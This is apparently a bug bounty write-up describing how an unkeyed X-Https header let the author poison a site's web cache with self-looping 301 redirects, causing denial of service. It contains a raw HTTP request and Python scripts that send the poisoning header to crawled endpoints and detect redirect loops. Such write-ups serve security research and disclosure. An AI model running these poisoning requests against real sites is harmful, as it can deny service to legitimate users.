From Minor Bug to Major DoS: My Journey with Web Cache Poisoning

Ayushkr

It started with a routine exploration of the samlsso endpoint on a [redacted] platform. At first, it seemed like a typical authentication endpoint, but a small anomaly hinted at something deeper.

Disclaimer: The domain names used in this write-up are anonymized as redacted.com for privacy and security reasons.

While testing, I discovered that the samlsso endpoint accepted an additional request header called X-Https, which caused the server to issue a 301 redirect. Here’s the request I used to observe this behavior:

POST /samlsso/?cache=foobar HTTP/2
Host: www.redacted.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.redacted.com/account/details.html
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
X-Https: foobar

HTTP/1.1 301 Moved Permanently
Location: https://www.redacted.com/samlsso?cache=foobar
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close

The server’s response was clear: it issued a 301 redirect. On its own this wasn’t a vulnerability, since the response wasn’t cached, but it provided a clue: the server might also honor X-Https on cacheable endpoints. If a shared cache stored such a redirect, and the X-Https header wasn’t part of the cache key, every visitor would be served the poisoned redirect even without sending the header.
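Before automating anything, a single endpoint can be probed by hand to see whether the redirect actually sticks in the cache. The sketch below (using the requests library; the target URL and output messages are illustrative, not taken from the original testing) sends one request with the X-Https header and then re-requests the same URL without it:

import requests

# Hypothetical cacheable URL with a cache buster so live visitors aren't affected
target = "https://www.redacted.com/some-page/?cache=foobar"

# Step 1: request WITH the unkeyed X-Https header to try to poison the cached response
poison = requests.get(target, headers={"X-Https": "foobar"}, allow_redirects=False, timeout=10)
print("Poisoning request:", poison.status_code, poison.headers.get("Location"))

# Step 2: request WITHOUT the header; if a 301 still comes back, the redirect was cached
clean = requests.get(target, allow_redirects=False, timeout=10)
if clean.status_code == 301:
    print("[!] Clean request also received the 301, so the cache likely stored the poisoned redirect")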

To test my hypothesis, I needed to check cacheable endpoints for similar behavior. Instead of manual testing, I automated the process using a Python script. The list of URLs (crawled.txt) was generated using Burp Suite’s crawler, which mapped out all the accessible endpoints on the domain.

Here’s the script I used:

import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

# Load crawled endpoints and add a cache buster to each URL
with open("crawled.txt", "r") as f:
    endpoints = [url.strip() + "?cache=foobar" for url in f.readlines()]

vulnerable_endpoints = []
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0",
    "Accept": "*/*",
    "X-Https": "foobar"
}

def check_endpoint(endpoint):
    try:
        response = requests.get(endpoint, headers=headers, allow_redirects=True, timeout=10)
        if response.history and len(response.history) > 1:
            # Check if it keeps redirecting to the same poisoned URL
            if response.url == endpoint:
                print(f"[VULNERABLE] Infinite redirect detected: {endpoint}")
                return endpoint
    except requests.exceptions.RequestException as e:
        print(f"[ERROR] Failed to check {endpoint}: {e}")
    return None

# Use ThreadPoolExecutor to check endpoints concurrently
with ThreadPoolExecutor(max_workers=10) as executor:
    future_to_endpoint = {executor.submit(check_endpoint, endpoint): endpoint for endpoint in endpoints}
    for future in as_completed(future_to_endpoint):
        result = future.result()
        if result:
            vulnerable_endpoints.append(result)

# Save the results
with open("poisoned_endpoints.txt", "w") as f:
    for url in vulnerable_endpoints:
        f.write(url + "\n")

Loading and Preparing Endpoints: The script reads URLs from crawled.txt and appends ?cache=foobar as a cache buster so live URLs aren’t poisoned.
Sending Concurrent Requests: Using ThreadPoolExecutor, the script sends requests with the X-Https header concurrently, making the process faster.
Checking Redirects: It checks whether the response history contains multiple redirects and whether the final URL matches the original. A match signals a poisoned cache causing infinite redirects.
Saving Results: Vulnerable URLs are saved to poisoned_endpoints.txt.

Within minutes, the script identified several poisoned endpoints. Opening these URLs in a browser revealed the infinite redirect issue in action. The browser would continuously loop, unable to load the page, effectively causing a Denial of Service (DoS).
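To double-check one of the flagged URLs outside the browser, a small helper like the one below can follow Location headers manually and count the hops. This is a rough sketch added for illustration (the helper name, hop limit, and URL are hypothetical, not part of the original script):

import requests

def count_redirect_hops(url, max_hops=10):
    # Follow Location headers by hand and report how many hops occur before giving up
    hops = 0
    current = url
    while hops < max_hops:
        resp = requests.get(current, allow_redirects=False, timeout=10)
        location = resp.headers.get("Location")
        if resp.status_code not in (301, 302) or not location:
            break
        current = requests.compat.urljoin(current, location)
        hops += 1
    return hops

# A poisoned endpoint keeps redirecting to itself, so this should hit the max_hops ceiling
print(count_redirect_hops("https://www.redacted.com/some-page/?cache=foobar"))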

After responsibly disclosing the issue, it was quickly triaged and confirmed by the security team on HackerOne. Below is a screenshot of the triaged report for reference:

This experience demonstrated how a minor clue, like a 301 redirect, can lead to discovering a critical vulnerability capable of mass DoS on the root domain. By exploiting web cache poisoning, I was able to identify multiple endpoints that could disrupt service for legitimate users.

Responsible disclosure ensured these vulnerabilities were patched without causing harm. For bug hunters, it’s a reminder that persistence and creative thinking can turn small hints into major finds.
